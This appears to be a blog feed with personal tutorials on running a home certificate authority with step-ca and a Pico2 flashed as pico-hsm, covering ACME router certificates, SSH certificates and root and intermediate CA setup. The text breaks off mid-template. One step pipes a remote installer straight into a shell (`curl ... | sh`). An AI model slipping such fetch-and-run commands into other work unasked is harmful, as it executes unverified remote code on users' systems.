class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Copy root_ca.crt to /root/certs/root_ca.crt</span></span><br><span class="line"><span class="comment"># Install acme.sh</span></span><br><span class="line">$ curl https://get.acme.sh | sh -s email=my@example.com</span><br><span class="line"></span><br><span class="line">$ ~/.acme.sh/acme.sh --issue -d 
router2.d9lab.eu.org \</span><br><span class="line">--server https://ca.lab.thinkalone.win:4443/acme/acme/directory \</span><br><span class="line">--ca-bundle /root/certs/root_ca.crt \</span><br><span class="line">--webroot /www --days 6 --reloadcmd <span class="string">"service uhttpd reload"</span></span><br></pre></td></tr></table></figure><p>Then edit <code>/etc/config/uhttpd</code></p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">...</span><br><span class="line"><span class="comment"># Make uhttpd listen on port 443</span></span><br><span class="line"> list listen_https <span class="string">'0.0.0.0:443'</span></span><br><span class="line"> list listen_https <span class="string">'[::]:443'</span></span><br><span class="line">...</span><br><span class="line"><span class="comment"># Point cert and key to the paths output by the acme.sh run above</span></span><br><span class="line"> option cert <span class="string">'/root/.acme.sh/router2.d9lab.eu.org_ecc/router2.d9lab.eu.org.cer'</span></span><br><span class="line"> option key <span class="string">'/root/.acme.sh/router2.d9lab.eu.org_ecc/router2.d9lab.eu.org.key'</span></span><br><span class="line">...</span><br></pre></td></tr></table></figure><h3 id="SSH"><a href="#SSH" class="headerlink" title="SSH"></a>SSH</h3><p>References:<br><a href="https://www.whatsdoom.com/posts/2020/02/29/ssh-certificates-with-step-ca/">SSH Certificates with step-ca</a><br><a href="https://zenn.dev/mnod/articles/15d4e93a9d44fc">step-ca で ssh証明書を扱う</a> </p><h4 id="Server"><a href="#Server" class="headerlink" title="Server"></a>Server</h4><p>Restart <code>step-ca</code> and check the logs for the <code>SSH Host CA Key</code> and <code>SSH User CA Key</code> </p><figure 
class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">$ <span class="built_in">sudo</span> service step-ca stop</span><br><span class="line">$ <span class="built_in">sudo</span> service step-ca start</span><br><span class="line">$ <span class="built_in">sudo</span> service step-ca status</span><br><span class="line">● step-ca.service - step-ca</span><br><span class="line"> Loaded: loaded (/etc/systemd/system/step-ca.service; enabled; preset: enabled)</span><br><span class="line"> Active: active (running) since </span><br><span class="line"> Main PID: 156738 (sh)</span><br><span class="line"> Tasks: 11 (<span class="built_in">limit</span>: 4529)</span><br><span class="line"> Memory: 14.4M</span><br><span class="line"> CPU: 305ms</span><br><span class="line"> CGroup: /system.slice/step-ca.service</span><br><span class="line"> ├─156738 /bin/sh -c <span class="string">"/usr/local/bin/step-ca /etc/step-ca/config/ca.json"</span></span><br><span class="line"> └─156739 /usr/local/bin/step-ca /etc/step-ca/config/ca.json</span><br><span class="line"></span><br><span class="line">......</span><br><span class="line">SSH Host CA Key: ecdsa-sha2-nistp256 AAA=</span><br><span class="line">SSH User CA Key: ecdsa-sha2-nistp256 AAB=</span><br><span class="line">......</span><br></pre></td></tr></table></figure><p>Write the <code>SSH User CA Key</code> to 
<code>/etc/ssh/ssh_user_ca_key.pub</code> </p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$ <span class="built_in">echo</span> <span class="string">"ecdsa-sha2-nistp256 AAB="</span> | <span class="built_in">sudo</span> tee /etc/ssh/ssh_user_ca_key.pub</span><br><span class="line">$ <span class="built_in">sudo</span> <span class="built_in">chown</span> root:root /etc/ssh/ssh_user_ca_key.pub</span><br><span class="line">$ <span class="built_in">sudo</span> <span class="built_in">chmod</span> 644 /etc/ssh/ssh_user_ca_key.pub</span><br></pre></td></tr></table></figure><p>Sign the host public key </p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$ <span class="built_in">sudo</span> <span class="built_in">cp</span> /etc/ssh/ssh_host_ecdsa_key.pub ssh_host_ecdsa_key.pub</span><br><span class="line">$ <span class="built_in">sudo</span> step ssh certificate <span class="variable">$HOSTNAME</span> ssh_host_ecdsa_key.pub --host --sign</span><br><span class="line">$ <span class="built_in">sudo</span> <span class="built_in">cp</span> ssh_host_ecdsa_key-cert.pub /etc/ssh/ssh_host_ecdsa_key-cert.pub</span><br></pre></td></tr></table></figure><p>Create <code>/etc/ssh/sshd_config.d/ca.conf</code> </p><figure class="highlight plaintext"><figcaption><span>ca.conf</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">TrustedUserCAKeys /etc/ssh/ssh_user_ca_key.pub</span><br><span class="line">HostCertificate /etc/ssh/ssh_host_ecdsa_key-cert.pub</span><br></pre></td></tr></table></figure><p>Test the <code>sshd</code> configuration and restart <code>sshd</code> </p><figure class="highlight 
bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ <span class="built_in">sudo</span> sshd -t</span><br><span class="line">$ <span class="built_in">sudo</span> service ssh restart</span><br></pre></td></tr></table></figure><p>Write the <code>SSH Host CA Key</code> to <code>~/.ssh/authorized_keys</code> </p><figure class="highlight plaintext"><figcaption><span>authorized_keys</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ecdsa-sha2-nistp256 AAA=</span><br></pre></td></tr></table></figure><h4 id="Client"><a href="#Client" class="headerlink" title="Client"></a>Client</h4><p>Generate the certificate used for connecting </p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">$ step ssh certificate disappear9@192.168.1.100 id_ecdsa</span><br><span class="line">......</span><br><span class="line">Please enter the password to encrypt the private key:</span><br><span class="line"> Private Key: id_ecdsa</span><br><span class="line"> Public Key: id_ecdsa.pub</span><br><span class="line"> Certificate: id_ecdsa-cert.pub</span><br></pre></td></tr></table></figure><p>Write the <code>SSH Host CA Key</code> to <code>~/.ssh/known_hosts</code> </p><figure class="highlight plaintext"><figcaption><span>known_hosts</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo "@cert-authority 192.168.1.100 ecdsa-sha2-nistp256 AAA=" >> ~/.ssh/known_hosts</span><br></pre></td></tr></table></figure><p>After that you can connect directly with <code>ssh disappear9@192.168.1.100</code> </p><p>(End)</p>]]></content>
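<summary type="html"><p>A few days ago I finally found time to finish the tutorial on building my own janky CA, which I had put off for almost a year: <a href="https://thinkalone.win/build-ca-with-picohsm.html">Building Your Own CA with Pico HSM and step-ca</a><br>Once it is built it ought to be used and played with, so this post covers some Step-CA usage, and also serves as a reference for myself. </p>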
<hr></summary>
<category term="教程" scheme="https://thinkalone.win/categories/%E6%95%99%E7%A8%8B/"/>
<category term="教程" scheme="https://thinkalone.win/tags/%E6%95%99%E7%A8%8B/"/>
<category term="折腾那些事" scheme="https://thinkalone.win/tags/%E6%8A%98%E8%85%BE%E9%82%A3%E4%BA%9B%E4%BA%8B/"/>
</entry>
<entry>
<title>Jank on Top of Jank: Building Your Own CA with Pico HSM and step-ca</title>
<link href="https://thinkalone.win/build-ca-with-picohsm.html"/>
<id>https://thinkalone.win/build-ca-with-picohsm.html</id>
<published>2025-12-10T04:00:00.000Z</published>
<updated>2026-01-15T04:00:00.000Z</updated>
<content type="html"><![CDATA[<h3 id="引言"><a href="#引言" class="headerlink" title="引言"></a>Introduction</h3><p>A few days ago I came across a piece of software in the Canokey group chat: <a href="https://github.com/smallstep/certificates">step-ca</a><br>In short, this software lets you build your own CA to play with, and it supports HSM devices</p><hr><h3 id="环境确认"><a href="#环境确认" class="headerlink" title="环境确认"></a>Environment</h3><p>Hardware:<br>  OrangePi Zero3<br>  Raspberry Pi Pico2<br>Operating system:<br>  Armbian v25.11.2 6.12.58-current-sunxi64<br>Software versions:<br>  go1.25.5<br>  step-ca 0.29.0<br>  OpenSC 0.26.1 </p><span id="more"></span> <h3 id="准备"><a href="#准备" class="headerlink" title="准备"></a>Preparation</h3><h4 id="安装Go"><a href="#安装Go" class="headerlink" title="安装Go"></a>Install Go</h4><p><a href="https://go.dev/doc/install">https://go.dev/doc/install</a></p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">$ wget https://go.dev/dl/go1.25.5.linux-arm64.tar.gz</span><br><span class="line">$ <span class="built_in">sudo</span> <span class="built_in">rm</span> -rf /usr/local/go && <span class="built_in">sudo</span> tar -C /usr/local -xzf go1.25.5.linux-arm64.tar.gz</span><br><span class="line">$ <span class="built_in">export</span> PATH=<span class="variable">$PATH</span>:/usr/local/go/bin</span><br><span class="line">$ go version</span><br><span class="line">go version go1.25.5 linux/arm64</span><br></pre></td></tr></table></figure><h4 id="编译-step-ca"><a href="#编译-step-ca" class="headerlink" title="编译 step-ca"></a>Build step-ca</h4><p>Because the officially built packages do not include HSM support, we need to build it manually </p><p><a href="https://github.com/smallstep/certificates/blob/master/CONTRIBUTING.md#build-step-ca-using-cgo">https://github.com/smallstep/certificates/blob/master/CONTRIBUTING.md#build-step-ca-using-cgo</a> </p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span 
class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">$ wget https://github.com/smallstep/certificates/archive/refs/tags/v0.29.0.tar.gz</span><br><span class="line">$ tar -xvzf v0.29.0.tar.gz</span><br><span class="line">$ <span class="built_in">cd</span> certificates-0.29.0</span><br><span class="line">$ <span class="built_in">sudo</span> apt install libpcsclite-dev gcc make pkg-config</span><br><span class="line">$ make bootstrap</span><br><span class="line">$ make build GO_ENVS=<span class="string">"CGO_ENABLED=1"</span></span><br><span class="line">$ <span class="built_in">sudo</span> <span class="built_in">cp</span> bin/step-ca /usr/local/bin</span><br><span class="line">$ <span class="built_in">sudo</span> <span class="built_in">setcap</span> CAP_NET_BIND_SERVICE=+eip /usr/local/bin/step-ca</span><br><span class="line">$ step-ca version</span><br><span class="line">Smallstep CA/ (linux/arm64)</span><br><span class="line">Release Date: 2025-12-03 14:16 UTC</span><br></pre></td></tr></table></figure><h4 id="安装-step-cli-和-step-kms-plugin"><a href="#安装-step-cli-和-step-kms-plugin" class="headerlink" title="安装 step-cli 和 step-kms-plugin"></a>Install step-cli and step-kms-plugin</h4><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">$ wget 
https://dl.smallstep.com/gh-release/cli/gh-release-header/v0.29.0/step-cli_0.29.0-1_arm64.deb</span><br><span class="line">$ <span class="built_in">sudo</span> dpkg -i step-cli_0.29.0-1_arm64.deb</span><br><span class="line">$ step version</span><br><span class="line">Smallstep CLI/0.29.0 (linux/arm64)</span><br><span class="line">Release Date: 2025-12-03T04:11:27Z</span><br><span class="line">$ wget https://github.com/smallstep/step-kms-plugin/releases/download/v0.16.0/step-kms-plugin_0.16.0-1_arm64.deb</span><br><span class="line">$ <span class="built_in">sudo</span> dpkg -i step-kms-plugin_0.16.0-1_arm64.deb</span><br><span class="line">$ step kms version</span><br><span class="line">🔐 step-kms-plugin/0.16.0 (linux/arm64)</span><br><span class="line"> Release Date: 2025-12-04T22:35:43Z</span><br></pre></td></tr></table></figure><h4 id="编译-OpenSC"><a href="#编译-OpenSC" class="headerlink" title="编译 OpenSC"></a>Build OpenSC</h4><p><a href="https://github.com/OpenSC/OpenSC/wiki/Compiling-and-Installing-on-Unix-flavors">https://github.com/OpenSC/OpenSC/wiki/Compiling-and-Installing-on-Unix-flavors</a> </p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">$ wget https://github.com/OpenSC/OpenSC/releases/download/0.26.1/opensc-0.26.1.tar.gz</span><br><span class="line">$ <span class="built_in">sudo</span> apt install pcscd libccid libpcsclite-dev libssl-dev libreadline-dev autoconf automake build-essential docbook-xsl xsltproc libtool pkg-config zlib1g-dev </span><br><span class="line">$ tar xfvz opensc-0.26.1.tar.gz</span><br><span class="line">$ <span class="built_in">cd</span> opensc-0.26.1</span><br><span class="line">$ ./bootstrap</span><br><span 
class="line">$ ./configure --prefix=/usr --sysconfdir=/etc/opensc</span><br><span class="line">$ make</span><br><span class="line">$ <span class="built_in">sudo</span> make install</span><br></pre></td></tr></table></figure><h4 id="配置-TRNG-(可选)"><a href="#配置-TRNG-(可选)" class="headerlink" title="配置 TRNG (可选)"></a>Configure the TRNG (optional)</h4><p>Here I use the <a href="https://github.com/leetronics/infnoise">Infinite Noise TRNG</a>, a fully open-source hardware TRNG</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">$ curl -LO https://github.com/leetronics/infnoise/archive/refs/tags/0.3.3.tar.gz</span><br><span class="line">$ tar xvzf 0.3.3.tar.gz</span><br><span class="line">$ <span class="built_in">cd</span> infnoise-0.3.3/software</span><br><span class="line">$ <span class="built_in">sudo</span> apt install libftdi-dev libusb-dev</span><br><span class="line">$ make -f Makefile.linux</span><br><span class="line">$ <span class="built_in">sudo</span> make -f Makefile.linux install</span><br><span class="line">$ infnoise --version</span><br><span class="line">GIT VERSION -</span><br><span class="line">GIT COMMIT -</span><br><span class="line">GIT DATE -</span><br><span class="line"></span><br><span class="line">$ <span class="built_in">sudo</span> init 6</span><br><span class="line">$ infnoise --debug --no-output</span><br><span class="line">Generated 1048576 bits. OK to use data. 
Estimated entropy per bit: 0.875965, estimated K: 1.835235</span><br><span class="line">num1s:50.019069%, even misfires:0.183222%, odd misfires:0.123520%</span><br><span class="line">Generated 2097152 bits. OK to use data. Estimated entropy per bit: 0.873196, estimated K: 1.831716</span><br><span class="line">num1s:49.909786%, even misfires:0.202971%, odd misfires:0.124232%</span><br><span class="line">......</span><br></pre></td></tr></table></figure><h4 id="烧录-pico-hsm-到-Pico2"><a href="#烧录-pico-hsm-到-Pico2" class="headerlink" title="烧录 pico-hsm 到 Pico2"></a>Flash pico-hsm onto the Pico2</h4><p><a href="https://github.com/polhenarejos/pico-hsm">https://github.com/polhenarejos/pico-hsm</a><br><a href="https://github.com/Gadgetoid/pico-universal-flash-nuke">https://github.com/Gadgetoid/pico-universal-flash-nuke</a> </p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ wget https://github.com/polhenarejos/pico-hsm/releases/download/v6.0/pico_hsm_pico2-6.0.uf2</span><br><span class="line">$ wget https://github.com/Gadgetoid/pico-universal-flash-nuke/releases/download/v1.0.1/universal_flash_nuke.uf2</span><br></pre></td></tr></table></figure><p>Hold down the BOOT button on the Pico2 board, plug in the USB cable, first flash <code>universal_flash_nuke.uf2</code> to wipe the flash, then flash <code>pico_hsm_pico2-6.0.uf2</code></p><h4 id="初始化-pico-hsm"><a href="#初始化-pico-hsm" class="headerlink" title="初始化 pico-hsm"></a>Initialize pico-hsm</h4><p><del>Update: currently, if you want to import certificates with the SCS3 tool, you can only initialize with Pico Commissioner; otherwise SCS3 keeps reporting authentication errors.</del><br>Update 2: this jerk of an author deleted the Pico Commissioner page and tools such as pypicohsm, had the existing web archives taken down as well, and now forces users to initialize with a new app that costs 30 euros per key.<br>Update 3: an Indian guy made a fork, <a href="https://github.com/librekeys">Libre Keys</a>, where most of the tools such as pypicohsm can now be downloaded.<br>Update 4: I wrote <a 
href="https://github.com/Disappear9/pico-hsm-cvcgen/blob/main/research/README_ZH.MD">a tutorial on generating the CVC certificate yourself</a>; after following it you can manage pico-hsm with SCS3. Using the original <code>2.0.2</code> version of <code>pypicohsm</code> directly will request the CVC certificate from the original author's server, which also works, but given how greedy this guy is being right now, I can't say how long that API will stay alive. </p><div class="tabs my-3 is-fullwidth"> <ul class="mx-0 my-0"> <li class="is-active"> <a href="#init-pico-hsm-py"> <p>pico-hsm-tool.py</p> </a> </li><li> <a href="#init-pico-hsm-commissioner"> <p>PicoCommissioner (defunct)</p> </a> </li> </ul> </div> <div id="init-pico-hsm-py" class="tab-content"> <figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">$ <span class="built_in">sudo</span> apt install python3-dev</span><br><span class="line">$ wget https://github.com/librekeys/pico-hsm/raw/refs/heads/master/tools/pico-hsm-tool.py</span><br><span class="line">$ python3 -m venv venv</span><br><span class="line">$ <span class="built_in">source</span> venv/bin/activate</span><br><span class="line">$ pip install pycvc cryptography pypicohsm</span><br><span class="line">$ python3 pico-hsm-tool.py</span><br><span class="line">$ deactivate</span><br></pre></td></tr></table></figure><p>Change the VID and PID of pico-hsm </p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">$ <span class="built_in">sudo</span> -i</span><br><span class="line">$ <span class="built_in">source</span> venv/bin/activate</span><br><span class="line">$ python pico-hsm-tool.py phy 
vidpid 20A0:4230</span><br><span class="line">$ <span class="built_in">exit</span></span><br><span class="line">$ lsusb</span><br><span class="line">Bus 006 Device 003: ID 20a0:4230 Clay Logic Nitrokey HSM</span><br><span class="line">Bus 006 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub</span><br><span class="line">Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub</span><br><span class="line">...</span><br></pre></td></tr></table></figure><p>Initialize pico-hsm </p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ python3 pico-hsm-tool.py --pin 648219 initialize --so-pin 57621880</span><br></pre></td></tr></table></figure> </div><div id="init-pico-hsm-commissioner" class="tab-content is-hidden"> <p><a href="https://www.picokeys.com/pico-commissioner/">https://www.picokeys.com/pico-commissioner/</a><br><img src="/pictures/pico-hsm/pico-commissioner.png" alt="pico-commissioner"> </p> </div><h3 id="创建RootCA和中间CA"><a href="#创建RootCA和中间CA" class="headerlink" title="创建RootCA和中间CA"></a>Create the Root CA and intermediate CA</h3><p>Here we generate the keys off-device and then import them. With a proper HSM product the recommendation is to generate keys only on the device and never import or export them, but this 10-yuan dev board could die at any moment, so an extra backup is a must. </p><p>Generate the Root CA private key </p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$ <span class="built_in">mkdir</span> -p certificate-authority/newcerts</span><br><span class="line">$ <span class="built_in">touch</span> certificate-authority/index.txt</span><br><span class="line">$ openssl ecparam -genkey -name secp384r1 -noout -out root-ca-key.pem</span><br></pre></td></tr></table></figure><figure class="highlight ini"><figcaption><span>create_root_cert.ini</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span 
class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br></pre></td><td class="code"><pre><span class="line"><span class="section">[ ca ]</span></span><br><span class="line"><span class="comment"># `man ca`</span></span><br><span class="line"><span class="attr">default_ca</span> = CA_default</span><br><span class="line"></span><br><span class="line"><span class="section">[ CA_default 
]</span></span><br><span class="line"><span class="comment"># Directory and file locations.</span></span><br><span class="line"><span class="attr">dir</span> = certificate-authority</span><br><span class="line"><span class="attr">certs</span> = <span class="variable">$dir</span>/certs</span><br><span class="line"><span class="attr">crl_dir</span> = <span class="variable">$dir</span>/crl</span><br><span class="line"><span class="attr">new_certs_dir</span> = <span class="variable">$dir</span>/newcerts</span><br><span class="line"><span class="attr">database</span> = <span class="variable">$dir</span>/index.txt</span><br><span class="line"><span class="attr">serial</span> = <span class="variable">$dir</span>/serial</span><br><span class="line"></span><br><span class="line"><span class="comment"># SHA-1 is deprecated, so use SHA-2 instead.</span></span><br><span class="line"><span class="attr">default_md</span> = sha512</span><br><span class="line"></span><br><span class="line"><span class="attr">name_opt</span> = ca_default</span><br><span class="line"><span class="attr">cert_opt</span> = ca_default</span><br><span class="line"><span class="attr">default_days</span> = <span class="number">375</span></span><br><span class="line"><span class="attr">preserve</span> = <span class="literal">no</span></span><br><span class="line"><span class="attr">policy</span> = policy_strict</span><br><span class="line"></span><br><span class="line"><span class="section">[ policy_strict ]</span></span><br><span class="line"><span class="comment"># The root CA should only sign intermediate certificates that match.</span></span><br><span class="line"><span class="comment"># See the POLICY FORMAT section of `man ca`.</span></span><br><span class="line"><span class="attr">countryName</span> = match</span><br><span class="line"><span class="attr">stateOrProvinceName</span> = match</span><br><span class="line"><span class="attr">organizationName</span> = match</span><br><span 
class="line"><span class="attr">organizationalUnitName</span> = optional</span><br><span class="line"><span class="attr">commonName</span> = supplied</span><br><span class="line"><span class="attr">emailAddress</span> = optional</span><br><span class="line"></span><br><span class="line"><span class="section">[ req ]</span></span><br><span class="line"><span class="comment"># Options for the `req` tool (`man req`).</span></span><br><span class="line"><span class="attr">default_bits</span> = <span class="number">4096</span></span><br><span class="line"><span class="attr">distinguished_name</span> = req_distinguished_name</span><br><span class="line"><span class="attr">string_mask</span> = utf8only</span><br><span class="line"><span class="attr">prompt</span> = <span class="literal">no</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># SHA-1 is deprecated, so use SHA-2 instead.</span></span><br><span class="line"><span class="attr">default_md</span> = sha512</span><br><span class="line"></span><br><span class="line"><span class="section">[ req_distinguished_name ]</span></span><br><span class="line"><span class="attr">C</span> = CN</span><br><span class="line"><span class="attr">O</span> = D9Lab</span><br><span class="line"><span class="attr">OU</span> = D9Lab Zero Certificate Authority</span><br><span class="line"><span class="attr">CN</span> = D9Lab Zero Root CA</span><br><span class="line"></span><br><span class="line"><span class="section">[ v3_ca ]</span></span><br><span class="line"><span class="comment"># Extensions for a typical CA (`man x509v3_config`).</span></span><br><span class="line"><span class="attr">subjectKeyIdentifier</span> = hash</span><br><span class="line"><span class="attr">authorityKeyIdentifier</span> = keyid:always,issuer</span><br><span class="line"><span class="attr">basicConstraints</span> = critical, CA:<span class="literal">true</span></span><br><span class="line"><span class="attr">keyUsage</span> 
= critical, digitalSignature, cRLSign, keyCertSign</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>Generate the Root CA certificate </p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ openssl req -config create_root_cert.ini -new -key root-ca-key.pem -x509 -days 3650 -sha512 -extensions v3_ca -out root-ca.crt</span><br></pre></td></tr></table></figure><p>If you can, it is advisable to import the Root CA key and certificate into a less sketchy device, <a href="https://thinkalone.win/canokey-canary.html#PIV">such as a Canokey.</a> </p><p>Generate the intermediate CA private key </p><div class="tabs my-3 is-fullwidth"> <ul class="mx-0 my-0"> <li class="is-active"> <a href="#intermediate-ca-hsm"> <p>Using an HSM device</p> </a> </li><li> <a href="#intermediate-ca-file"> <p>Without an HSM device</p> </a> </li> </ul> </div> <div id="intermediate-ca-hsm" class="tab-content"> <p>First, temporarily unplug the Pico HSM and plug in a device such as a Canokey/YubiKey<br>Package the certificate and private key into <code>p12</code> format </p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Note: you must set a password, otherwise the import will fail! 
</span></span><br><span class="line">$ openssl pkcs12 -<span class="built_in">export</span> -out root-ca.p12 -inkey root-ca-key.pem -<span class="keyword">in</span> root-ca.crt</span><br></pre></td></tr></table></figure><p>Import the Root CA certificate in <code>p12</code> format into the HSM device, using a Canokey as the example </p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ yubico-piv-tool -r canokeys -s 9a -i root-ca.p12 -KPKCS12 -a import-key -a import-cert</span><br></pre></td></tr></table></figure><p>Find the ID of the certificate imported into the Canokey </p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ pkcs11-tool --module /usr/lib/opensc-pkcs11.so -O</span><br></pre></td></tr></table></figure><p>If all is well, you should see output similar to this: </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">...</span><br><span class="line">Certificate Object; type = X.509 cert</span><br><span class="line"> label: Certificate for Key Management</span><br><span class="line"> subject: DN: C=CN, O=D9Lab, OU=D9Lab Zero Certificate Authority, CN=D9Lab Zero Root CA</span><br><span class="line"> serial: ************</span><br><span class="line"> ID: 03</span><br><span class="line"> uri: pkcs11:model=PKCS%2315%20emulated;manufacturer=piv_II;serial=************;token=Disappear9%20%27s%20CanoKey;id=%03;object=Certificate%20for%20Key%20Management;type=cert</span><br><span class="line">...</span><br></pre></td></tr></table></figure><p>Note down this <code>ID 03</code>; it will be needed next </p><p>Create the intermediate CA template </p><figure class="highlight json"><figcaption><span>intermediate.tpl</span></figcaption><table><tr><td 
class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">{</span></span><br><span class="line"> <span class="attr">"subject"</span><span class="punctuation">:</span> <span class="punctuation">{</span><span class="punctuation">{</span> toJson .Subject <span class="punctuation">}</span><span class="punctuation">}</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"keyUsage"</span><span class="punctuation">:</span> <span class="punctuation">[</span><span class="string">"certSign"</span><span class="punctuation">,</span> <span class="string">"crlSign"</span><span class="punctuation">]</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"basicConstraints"</span><span class="punctuation">:</span> <span class="punctuation">{</span></span><br><span class="line"> <span class="attr">"isCA"</span><span class="punctuation">:</span> <span class="literal"><span class="keyword">true</span></span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"maxPathLen"</span><span class="punctuation">:</span> <span class="number">0</span></span><br><span class="line"> <span class="punctuation">}</span><span class="punctuation">,</span></span><br><span class="line"> <span class="attr">"crlDistributionPoints"</span><span class="punctuation">:</span> <span class="punctuation">[</span><span class="string">"http://ca.lab.d9lab.eu.org/1.0/crl"</span><span class="punctuation">]</span></span><br><span class="line"><span 